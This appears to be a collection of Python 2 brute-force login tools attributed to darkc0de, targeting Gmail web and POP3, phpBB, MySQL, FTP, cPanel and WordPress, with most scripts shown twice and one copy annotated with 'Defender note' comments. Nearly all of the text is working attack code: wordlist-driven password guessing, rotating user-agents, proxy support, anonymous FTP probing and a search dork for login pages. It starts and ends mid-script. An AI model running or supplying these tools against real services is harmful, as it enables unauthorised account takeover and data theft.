class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
phpBB Brute Forcer POC
#!usr/bin/python
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py "
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
# Returns one randomly chosen entry from the global `words` list.
# While the list is non-empty, the chosen entry is removed from it. Once it
# is empty, reloader() refills it from `wordlist` and an entry is chosen
# without being removed. A threading.Lock is created, acquired and released
# inside each call.
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
# Thread that makes one login attempt against the phpBB URL in sys.argv[1]
# with a word taken from getword().
# run() loads the page, fills the "username" and "password" fields of the
# first form, submits it and scans the response line by line. A line
# containing "invalid password" (compared in lower case) makes it print
# "Successful Login", store the word in the global `success` and exit the
# thread; a line matching the "maximum number of 5 login attempts" message
# makes it print "Attempts exceeded". socket.gaierror is caught and ignored.
# Defender notes: the login-attempt limit named in that message is the
# control that throttles this script, as its own header comment
# acknowledges. The User-agent is picked at random from a small fixed list,
# so filtering on a single User-agent value will not cover all attempts.
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
# Fresh cookie jar and opener for this attempt.
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
MySQL Brute Forcer
#!usr/bin/python
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py "
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
# Hand out the next (password, user) pair.
# The user is always the first entry of `users`. Passwords are drawn at random
# from `words` and removed; when `words` is empty it is refilled through
# reloader() and the first user is dropped, so the list is walked once per
# user before moving to the next one.
#
# Defender note: each account therefore receives a long run of consecutive
# failed logins before the next account is touched, which is exactly the
# pattern a per-account failed-login threshold detects.
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
# [:-1] drops the last character of the entry - presumably the line ending
# left by readlines(); the single remaining user is returned unmodified.
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
# Worker thread: each instance opens one MySQL connection with one
# user/password pair against host sys.argv[1], port sys.argv[2] and database
# sys.argv[3].
#
# Defender note: every attempt is a full client connection to the database
# port, so it is visible in the server's authentication failure records and in
# network flow data. Keeping the database port unreachable from untrusted
# networks removes the exposure; failed-login monitoring covers the rest.
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
# Reached only when connect() did not raise.
print "\t\nLogin successful:",value, user
db.close()
# `work` is the module-level name bound by the launch loop.
work.join()
sys.exit(2)
# Every MySQLdb error is swallowed without being reported.
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
# Launch loop: one Worker thread per (word, user) combination, counted from
# the list sizes at the time the loop starts. The one-second sleep presumably
# sits inside the loop (indentation is lost in this listing), giving about one
# connection attempt per second - TODO confirm.
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
print "\t\nLogin successful:",value, user
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
FTP brute forcer
#!usr/bin/python
#Ftp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
# Startup: argument check, list loading, banner, then two probes of the FTP
# server named in sys.argv[1] before any guessing starts.
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
# User list and word list are read fully into memory, one entry per line.
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
# Probe 1: connect and print the server's welcome banner.
# Defender note: whatever the banner discloses is handed to any client that
# connects, before authentication.
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
# Probe 2: login() with no arguments, followed by a directory listing.
# Defender note: this is the first thing tried, ahead of any password guess,
# so anonymous access should be disabled unless it is deliberately offered.
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
# Pristine copy used by reloader() to refill `words`.
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
# Worker thread: each instance opens a new FTP control connection to
# sys.argv[1] and tries one user/password pair.
#
# Defender note: every guess is a separate connection followed by a login
# attempt, so the server log shows a run of failed logins for one user name
# from one client. Connection-rate limits and failed-login thresholds on the
# FTP service are the controls that interrupt it.
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
# A directory listing is requested right after a login that did not raise.
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
# `work` is the module-level name bound by the launch loop.
work.join()
sys.exit(2)
# Every ftplib error is swallowed without being reported.
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
#Ftp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
Gmail Pop3 Brute Forcer
#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py \n"
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]
# Worker thread: each instance opens one POP3-over-SSL session to the
# module-level `server` on port 995 and tries one user/password pair.
#
# Defender note: the guessing goes through the POP3 login path and not the
# web sign-in page, so protections that exist only on the web login do not
# apply to it. Accounts that do not need POP3 should have it switched off,
# and failed POP3 authentications should feed the same alerting as web logins.
class Worker(threading.Thread):
def run(self):
value, user = getword()
# Both values come from readlines(); newline characters are removed here.
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
# Reached only when pass_() did not raise; stat() is queried for the counts
# that are printed and stored.
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
# Results are appended to the shared module-level list `success`.
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
# Protocol errors, including rejected logins, are swallowed silently.
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done"
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]
class Worker(threading.Thread):
def run(self):
value, user = getword()
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done"
CPanel Brute Forcer
#!usr/bin/python
#cPanel BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py \n"
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
# Request `url` once without credentials and return the value of the
# www-authenticate response header.
# The script exits when the request succeeds, when the failure is not an HTTP
# 401, or when the 401 carries no www-authenticate header.
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
# Expected path: the unauthenticated request is refused; `e` is inspected below.
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
# Worker thread: each instance makes one HTTP request to the module-level
# `server` with one username/password pair registered for the realm "cPanel".
#
# Defender note: on the server side this appears as a sequence of 401
# responses on the control-panel port for a single user name. Limiting which
# networks may reach that port and throttling repeated 401s per source and per
# account are the controls that apply.
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
# The handler is rebuilt and installed globally for every attempt.
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
# Reached only when urlopen() did not raise.
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
# HTTP errors and malformed status lines are swallowed silently.
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
# Main sequence: build the target from the command line, print the summary,
# check that the target answers with a 401 challenge, then start the workers.
title()
# A trailing "/" is removed from the host argument.
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
# `server` is first set with the fixed port 2082 and then rebuilt below from
# the port argument once that has been checked to be numeric.
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
# getauth() exits the script unless the target returns a 401 with a
# www-authenticate header.
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
# One daemon thread per (word, user) combination. The one-second sleep
# presumably sits inside the loop (indentation is lost in this listing) -
# TODO confirm.
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"
#cPanel BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
title()
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"
wordpress BruteForce
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)
#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)
#Dork: inurl:wp-login.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
# Flat script: parses the command line, optionally tests a proxy, then posts
# the login form once per word-list entry, sequentially and without threads.
#
# Defender note: the requests carry no cookies (the script stops when the site
# answers "WordPress requires Cookies"), they repeat the same `log` value with
# a changing `pwd`, and they may arrive through a proxy, in which case the
# source address is not the operator's. Detection and throttling should
# therefore be keyed on the targeted account as well as on the source address.
print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
# Option scan: `proxy` and `verbose` are only bound when their flag is present.
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
# Proxy check: a plain connection is opened to the proxy address. An unbound
# `proxy` raises NameError, which is how "not given" is detected; every
# failure path sets proxy to 0.
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
# Same NameError technique for the verbose flag.
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
# "http://" is prepended when the first argument does not start with it.
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
